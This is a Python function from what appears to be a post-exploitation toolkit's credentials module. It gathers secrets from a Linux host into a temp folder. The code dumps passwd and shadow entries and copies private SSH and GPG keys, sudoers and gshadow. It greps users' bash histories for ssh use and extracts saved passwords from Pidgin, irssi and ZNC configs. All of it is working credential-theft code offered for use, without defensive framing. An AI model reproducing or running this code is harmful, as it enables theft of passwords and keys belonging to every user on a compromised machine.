
def creds():
    '''
    @description: Gather user and system credentials. Looks for passwords, SSH keys, SSL certs, certain application creds, user histories and more.
    @author: ohdae [bindshell@live.com]
    @short: enumerate user and system credentials
    '''
    log_msg("\n\n [ Credentials Module ]")
    log_msg("\n Start Time: %s" % logtime)

    print("[+] Collecting user and system credentials....")
    maketemp("credentials")
    os.chdir(Temp_Dir+"/credentials/")
    users()
    
    os.system('getent passwd > passwd.txt')
    os.system('getent shadow > shadow.txt')
    os.system("lastlog > lastlog.txt")
    os.system("last -a > last.txt")
    os.system("getent aliases > mail_aliases.txt")
    log_msg("\n ACTION: passwd, shadow, lastlog and mail aliases collected.")

    if currentuser == "root":
        os.system("find / -maxdepth 3 -name .ssh > ssh_locations.txt")
        for user in userlist:
            if os.path.exists("/home/%s" % user) is True:
                os.system("ls /home/%s/.ssh/* > ssh_contents.txt" % user) 
    else:
        os.system("ls %s/.ssh/* > ssh_contents.txt" % Home_Dir)
  
    sshfiles = ["ssh_locations.txt","ssh_contents.txt"]
    combinefiles("SSH_Locations.txt", sshfiles)
    for files in sshfiles:
        if os.path.exists(files) is True:
            os.system("rm %s" % files)

    for user in userlist:
        if os.path.exists("/home/%s/.bash_history" % user) is True:
            os.system("cat /home/%s/.bash_history | grep ssh > %s-SSH-History.txt" % (user, user))
        if currentuser == "root":
            if os.path.exists("%s/.bash_history" % Home_Dir) is True:
                os.system("cat %s/.bash_history | grep ssh > Root-SSH-History.txt" % Home_Dir)

    credentials = [ "/etc/master.passwd", "/etc/sudoers", "/etc/ssh/sshd_config", Home_Dir+"/.ssh/id_dsa", Home_Dir+"/.ssh/id_dsa.pub",
                    Home_Dir+"/.ssh/id_rsa", Home_Dir+"/.ssh/id_rsa.pub", Home_Dir+"/.gnupg/secring.gpg", Home_Dir+"/.ssh/authorized_keys",
                    Home_Dir+"/.ssh/known_hosts", "/etc/gshadow", "/etc/ca-certificates.conf", "/etc/passwd" ]

    for x in credentials:
        copy2temp(x, "credentials")


    if whereis('pidgin') is not None:
        for user in userlist:
            if os.path.exists("/home/%s/.purple/accounts.xml" % user) is True:
                accts = open("/home/%s/.purple/accounts.xml" % user)
                saved = open("Pidgin.txt", "a")
                for line in accts.readlines():
                    if '<protocol>' in line:
                        saved.write(line)
                    elif '<name>' in line:
                        saved.write(line)
                    elif '<password>' in line:
                        saved.write(line)
                    else:
                        pass
                    
                accts.close()
                saved.close()

    for user in userlist:
        if os.path.exists("/home/%s/.irssi/config" % user) is True:
            accts = open("/home/%s/.irssi/config" % user)
            saved = open("irssi.txt", "a")
            for line in accts.readlines():
                if "password = " in line:
                    saved.write(line)
                else:
                    pass
            accts.close()
            saved.close()

    for user in userlist:
        copy2temp("/home/%s/.znc/configs/znc.conf" % user)



